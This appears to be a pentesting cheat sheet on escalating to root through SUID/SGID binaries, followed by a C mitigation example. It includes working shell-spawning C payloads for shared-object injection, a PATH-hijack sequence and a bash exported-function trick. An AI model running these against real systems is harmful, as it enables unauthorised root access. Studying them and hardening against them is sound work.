
SUID and SGID Executables

Find files with the SGID or SUID bit set
find / -type f -a \( -perm -u+s -o -perm -g+s \) -exec ls -l {} \; 2> /dev/null
See which commands/executables a file is trying to run
strings <program>
Confirm which executable/command a program is trying to run
strace -v -f -e execve <program> 2>&1 | grep <executable/command>
ltrace <program>
Check file for missing shared objects
ldd <executable>
Update cache to include new shared objects
ldconfig
  • Check GTFOBins for flags that let the binary execute arbitrary commands
  • Check whether the binary being called is referenced without an absolute path (scp vs /usr/bin/scp)

Shared object not found

  • Vulnerable to shared object injection
  • Find shared objects that are not found by the executable
  • Create a shared object in the directory where the shared object is being searched for
#define _GNU_SOURCE
#include <stdlib.h>
#include <unistd.h>

int main(void) {
    setresuid(0, 0, 0);
    system("/bin/bash");
}

If compiling fails with: gcc: error trying to exec 'cc1': execvp: No such file or directory

Check environment variables to make sure PATH has been set: export

If PATH has not been set, then set it: export PATH

File calls for executable without absolute path

  • We can add a malicious version of the executable to our PATH.
  • Create a malicious executable with the same name as the program that is being called without an absolute path
#include <stdlib.h>
#include <unistd.h>

int main(void) {
    setuid(0);
    system("/bin/bash -p");
    return 0;
}

Compile with: gcc -o

  • export PATH=.:$PATH
  • Execute the vulnerable SUID/SGID binary

File calls for executable with absolute path and bash < 4.2-048

  • function { /bin/bash -p; }
  • export -f
  • Execute the vulnerable SUID/SGID file
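
Mitigation for the last two sections, as an added example that is not part of the original page: a privileged program should launch helpers with execve() on an absolute path and a fixed environment, so the caller's PATH and exported shell functions never reach the child. run_fixed and CLEAN_ENV are hypothetical names, and the environment values set in main are constructed.

```c
/* Weak form the page targets: e.g. system("scp ...") starts a shell and
 * searches the caller's PATH. Hardened form below (added example). */
#define _GNU_SOURCE
#include <stdio.h>
#include <stdlib.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <unistd.h>

/* Fixed environment: the caller's PATH, LD_* variables and exported shell
 * functions (all passed as environment variables) are not inherited. */
static char *const CLEAN_ENV[] = { "PATH=/usr/bin:/bin", NULL };

/* run_fixed (hypothetical name): run `path` with argv and CLEAN_ENV.
 * Returns the child's exit status, or -1 if the path is not absolute
 * or the child could not be started or did not exit normally. */
int run_fixed(const char *path, char *const argv[])
{
    if (path == NULL || path[0] != '/')
        return -1;                      /* refuse any PATH lookup */

    pid_t pid = fork();
    if (pid < 0)
        return -1;
    if (pid == 0) {
        execve(path, argv, CLEAN_ENV);  /* no shell, no PATH search */
        _exit(127);                     /* exec failed */
    }
    int status;
    if (waitpid(pid, &status, 0) < 0 || !WIFEXITED(status))
        return -1;
    return WEXITSTATUS(status);
}

int main(void)
{
    /* Constructed hostile environment, as the caller of a SUID binary controls it. */
    setenv("PATH", ".:/tmp", 1);
    setenv("LD_LIBRARY_PATH", "/tmp", 1);

    char *rel[] = { "scp", NULL };
    printf("relative name rejected: %d\n", run_fixed("scp", rel));

    char *chk[] = { "sh", "-c",
        "[ \"$PATH\" = /usr/bin:/bin ] && [ -z \"$LD_LIBRARY_PATH\" ]", NULL };
    printf("child saw clean env:    %d\n", run_fixed("/bin/sh", chk));
    return 0;
}
```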